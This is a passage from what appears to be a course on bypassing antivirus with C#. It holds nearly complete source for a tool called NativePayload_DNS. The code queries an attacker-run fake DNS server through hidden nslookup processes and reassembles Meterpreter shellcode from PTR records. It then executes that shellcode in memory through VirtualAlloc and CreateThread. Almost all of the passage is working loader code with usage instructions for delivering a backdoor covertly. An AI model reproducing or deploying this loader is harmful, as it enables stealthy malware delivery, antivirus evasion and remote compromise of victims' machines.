_DnsServer = args[2].ToString();
}
catch (Exception err)
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("");
Console.WriteLine("Command Syntax : NativePayload_DNS.exe \"StartIpaddress\" counter_Number_of_Records \"FakeDNS_Server\" ");
Console.WriteLine("Command Syntax : NativePayload_DNS.exe \"1.1.1.\" 34 \"192.168.1.50\" ");
Console.WriteLine("for more information please visit github account for this tool");
Console.WriteLine("");
Console.WriteLine("");
Console.WriteLine("[1] error: {0}", err.Message);
Console.ForegroundColor = ConsoleColor.DarkGray;
}
try
{
string[] _DATA = new string[_IPaddress_Counter];
string DATA = "";
Console.ForegroundColor = ConsoleColor.DarkGreen;
Console.WriteLine("NativePayload_DNS by Damon Mohammadbagher");
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Starting Download Backdoor Payloads by DNS Traffic from FakeDNS_Server");
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("DNS Server: {0} ", _DnsServer);
for (int i = 0; i < _IPaddress_Counter; i++)
{
_DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);
DATA += _DATA[i].ToString();
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("DNS Request Send: {0}", (_IPaddress_Begin + i).ToString());
Console.ForegroundColor = ConsoleColor.DarkYellow;

18 / 19 Course Author/Publisher : Damon Mohammadbagher

Course : Bypassing Anti Viruses by C#.NET Programming
Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 3 : DATA Transferring / Downloading Method by DNS Traffic (PTR Records)
Console.WriteLine("DNS Response type PTR Record: {0}", _Records);
Console.ForegroundColor = ConsoleColor.DarkGray;
}
string[] Payload__Without_delimiterChar = DATA.Split('x');
object tmp = new object();
byte[] __Bytes = new byte[DATA.Length / 4];
for (int i = 1; i < __Bytes.Length; i++)
{
tmp = Payload__Without_delimiterChar[i].ToString().Substring(0, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}
Console.WriteLine();
Console.WriteLine("Bingo Meterpreter session by DNS traffic ;)");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
catch (Exception err2)
{
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("[2] error: {0}", err2.Message);
Console.ForegroundColor = ConsoleColor.DarkGray;
}
}
public static string _Records = "";
public static string __nslookup(string DNS_PTR_A, string DnsServer)
{
/// Make DNS traffic for getting Meterpreter Payloads by nslookup
ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_PTR_A + " " + DnsServer);
ns_Prcs_info.RedirectStandardInput = true;
ns_Prcs_info.RedirectStandardOutput = true;
ns_Prcs_info.UseShellExecute = false;
// you can use Thread Sleep here

Process nslookup = new Process();

nslookup.StartInfo = ns_Prcs_info;
nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
nslookup.Start();

/// if you want to change your Domain Name from "1.com" to "22.com"
/// then you should change these Settings and Values too ;)
string computerList = nslookup.StandardOutput.ReadToEnd();
string[] lines = computerList.Split('\r', 'n');
string last_line = lines[lines.Length - 4];
string temp_1 = last_line.Remove(0, 11);
_Records = "\"" + temp_1;
int i = temp_1.LastIndexOf('.');
string temp_2 = temp_1.Remove(i, (temp_1.Length - i));
int b = temp_2.LastIndexOf('.');
string final = temp_2.Remove(b, temp_2.Length - b);
return final;
}

private static UInt32 MEM_COMMIT = 0x1000;

private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref
UInt32 lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
}

19 / 19 Course Author/Publisher : Damon Mohammadbagher